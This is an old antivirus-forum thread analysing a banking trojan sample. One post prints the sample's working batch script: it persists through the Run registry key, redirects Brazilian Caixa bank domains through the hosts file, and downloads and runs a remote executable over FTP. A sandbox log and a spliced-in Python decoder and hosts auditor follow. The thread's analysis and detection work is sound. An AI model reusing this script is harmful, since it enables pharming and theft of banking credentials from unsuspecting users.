[Virus sample] MD5 50891E magico.com (after these two items everyone is free to add more)---example post under the new rules

lanvin
Posted on 2007-6-4 11:40:18

The MD5 is the fingerprint checksum of the archive.

[ This post was last edited by lanvin on 2007-6-4 15:01 ]

kp2006
Posted on 2007-6-4 11:45:40
Win32:Trojan-gen. {Delphi}
scottxzt
Posted on 2007-6-4 11:51:01
pass
taihuxian
Posted on 2007-6-4 12:05:20
Virus: Win32:Trojan-gen. {Delphi}

Virus found while downloading Web content.

Address: bbs.kafan.cn
傻猪猪米走鸡
Posted on 2007-6-4 12:17:05
A .com file?? Is this a fossil?
Probably not. Anyway, NOD let it through.
Nblock
Posted on 2007-6-4 12:32:50
Originally posted by 傻猪猪米走鸡 on 2007-6-4 12:17:
A .com file?? Is this a fossil?
Probably not. Anyway, NOD let it through.


Just double-click it and you'll find out~ 微点 (Micropoint) kills it
人浪流涯天
Posted on 2007-6-4 13:23:34
@echo off
@break off

ver|find "Windows 98">nul
if not errorlevel 1 goto win

:xp
if not exist %WinDir%\system32\systemdll.exe goto insxp
if exist %WinDir%\system32\systemdll.exe goto chk

:insxp
echo y|reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftUpdate /t REG_SZ /d %WinDir%\system32\systemdll.exe
copy correio_magico.com  %WinDir%\system32\systemdll.exe
start /max iexplore.exe "http://correio.cartoes-legais.com/"
goto dns

:chk
set ping=%windir%\system32\ping.exe
%ping% www.google.com -n 1 -l 1 | find "TTL" > nul
if not errorlevel 1 goto dns
goto chk

:dns
for /f "tokens=2" %%D in ('nslookup dns1.cocanaocola.com ^| find "Address"') do set dns1=%%D
set w=www
set co=com
set go=gov
set ca=cai
set c1=in^t^erne^t%ca%x^a.%ca%x^a.%go%.b^r
set c2=%w%.%ca%x^a.%co%.b^r
set c3=%w%^.%ca%x^a^.%go%.b^r
set c4=%w%^.c^ef.%co%.b^r
set c5=%w%.^c^e^f.^%go%.^br
set c6=%w%.%ca%x^aeco^nom^ic^a.%co%.br
set c7=%w%.%ca%x^ae^con^om^ic^a^.%go%^.b^r
set c8=%w%.%ca%xaec^on^omi^cafe^d^e^r^al^.%co%.^b^r
set c9=%ca%x^a^.%co%^.^b^r
set c10=%ca%^xa^.^%go%.^br
set c11=c^e^f.^%co%^.^b^r
set c12=ce^f.%go%^.^br
set c13=%ca%xae^co^n^o^mica.%co%^.^br
set c14=%ca%xa^e^c^o^no^mi^ca^.^%go%.^b^r
echo %dns1% %c1%>%windir%\temp\cevfr.007
echo %dns1% %c2%>>%windir%\temp\cevfr.007
echo %dns1% %c3%>>%windir%\temp\cevfr.007
echo %dns1% %c4%>>%windir%\temp\cevfr.007
echo %dns1% %c5%>>%windir%\temp\cevfr.007
echo %dns1% %c6%>>%windir%\temp\cevfr.007
echo %dns1% %c7%>>%windir%\temp\cevfr.007
echo %dns1% %c8%>>%windir%\temp\cevfr.007
echo %dns1% %c9%>>%windir%\temp\cevfr.007
echo %dns1% %c10%>>%windir%\temp\cevfr.007
echo %dns1% %c11%>>%windir%\temp\cevfr.007
echo %dns1% %c12%>>%windir%\temp\cevfr.007
echo %dns1% %c13%>>%windir%\temp\cevfr.007
echo %dns1% %c14%>>%windir%\temp\cevfr.007
type %windir%\temp\cevfr.007>%windir%\system32\drivers\etc\hosts
del /q /f %windir%\temp\cevfr.007
exit

:win
if exist "%windir%\\All Users\Menu Iniciar\Programas\Iniciar\"systemdll.exe goto png
copy correiomagico.com "%windir%\All Users\Menu Iniciar\Programas\Iniciar\"systemdll.exe
start /max iexplore.exe "http://correio.cartoes-legais.com/"
goto dwn

:png
set pong=%windir%\ping.exe
%pong% www.google.com -n 1 -l 1 | find "vida" > nul
if not errorlevel 1 goto dwn
goto png

:dwn
if exist %windir%\winstart.exe goto upd
cd %temp%
echo extremus>%temp%\a
echo chakarov>>%temp%\a
echo cd www>>%temp%\a
echo cd images>>%temp%\a
echo cd global>>%temp%\a
echo get winstart.exe>>%temp%\a
echo quit>>%temp%\a
ftp -s:%temp%\a ftp.extremus.info
copy %temp%\winstart.exe %windir%
del %temp%\winstart.exe
del %temp%\a

:upd
cd %temp%
%windir%\winstart.exe http://x.cocanaocola.com/
type x>%windir%\hosts
del x
exit

RZ virus
Redevil
Posted on 2007-6-4 13:32:53
创建值        \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate
试图使用命令行参数运行浏览器: "C:\Program Files\Internet Explorer\iexplore.exe"  "http://correio.cartoes-legais.com/"。
创建文件        C:\DOCUME~1\Redevil\LOCALS~1\Temp\bt0206.bat
Modified many registry values
Modified the hosts file, adding:
66.111.50.50 internetcaixa.caixa.gov.br
66.111.50.50 www.caixa.com.br
66.111.50.50 www.caixa.gov.br
66.111.50.50 www.cef.com.br
66.111.50.50 www.cef.gov.br
66.111.50.50 www.caixaeconomica.com.br
66.111.50.50 www.caixaeconomica.gov.br
66.111.50.50 www.caixaeconomicafederal.com.br
66.111.50.50 caixa.com.br
66.111.50.50 caixa.gov.br
66.111.50.50 cef.com.br
66.111.50.50 cef.gov.br
66.111.50.50 caixaeconomica.com.br
66.111.50.50 caixaeconomica.gov.br

[ This post was last edited by Redevil on 2007-6-4 13:34 ]
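As an added example (not code from the thread or from the sample), the Python below decodes the caret-obfuscated `set` lines of the batch script posted above and then audits the hosts entries they produce, flagging the pattern Redevil's sandbox log shows: one public IP claiming many dotted domain names. The batch excerpt is copied verbatim from the post; the IP 66.111.50.50 is the one from the sandbox log, and the `localhost` line is a constructed benign entry.

```python
"""Decode the sample's obfuscated `set` lines and audit the hosts entries.
Added example for this thread; not the malware's own code."""
import ipaddress
import re
from collections import defaultdict

# Verbatim excerpt of the obfuscated assignments from the posted script.
BATCH_EXCERPT = r"""
set w=www
set co=com
set go=gov
set ca=cai
set c1=in^t^erne^t%ca%x^a.%ca%x^a.%go%.b^r
set c8=%w%.%ca%xaec^on^omi^cafe^d^e^r^al^.%co%.^b^r
set c14=%ca%xa^e^c^o^no^mi^ca^.^%go%.^b^r
"""

def decode_sets(script):
    """Evaluate `set name=value` lines as cmd.exe does: `%var%` is expanded
    from earlier assignments first, then `^` (an escape that hides the
    string from simple grep) is removed."""
    env = {}
    for line in script.splitlines():
        m = re.match(r"\s*set\s+(\w+)=(.*)$", line, re.IGNORECASE)
        if not m:
            continue
        name, value = m.group(1), m.group(2)
        value = re.sub(r"%(\w+)%", lambda v: env.get(v.group(1).lower(), ""), value)
        env[name.lower()] = value.replace("^", "")
    return env

def hosts_hijacks(lines, min_domains=3):
    """Group hosts entries by IP and flag public (non-loopback, non-private)
    IPs that claim several dotted names: the pharming pattern this sample
    writes into %windir%\\system32\\drivers\\etc\\hosts."""
    by_ip = defaultdict(set)
    for line in lines:
        parts = line.split("#", 1)[0].split()
        if len(parts) < 2:
            continue
        try:
            addr = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # not a hosts entry
        if addr.is_loopback or addr.is_private or addr.is_unspecified:
            continue
        by_ip[str(addr)].update(n.lower() for n in parts[1:] if "." in n)
    return {ip: sorted(n) for ip, n in by_ip.items() if len(n) >= min_domains}

def audit_sample(dns1="66.111.50.50"):
    """Rebuild the lines the script's `echo %dns1% %cN%` statements emit
    (dns1 from the sandbox log) and run the audit over them."""
    env = decode_sets(BATCH_EXCERPT)
    lines = ["127.0.0.1 localhost"] + [f"{dns1} {env[k]}" for k in ("c1", "c8", "c14")]
    return env, hosts_hijacks(lines)
```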
wangjay1980
Posted on 2007-6-4 13:47:22
Hello.

New malicious software was found in the attached file.
Trojan.BAT.Agent.ac
Its detection will be included in the next update. Thank you for your help.
-----------------
Regards, Roman Gavrilchenko
Virus Analyst, Kaspersky Lab.

Ph.: +7(495) 797-8700
E-mail: newvirus@kaspersky.com
http://www.kaspersky.com   http://www.viruslist.com
http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.


> Attachment: magico.zip
wangjay1980
Posted on 2007-6-4 17:01:56
deleted: Trojan program Trojan.BAT.Agent.ac        File: C:\Documents and Settings\Owner\桌面\magico.zip/magico.com//BAT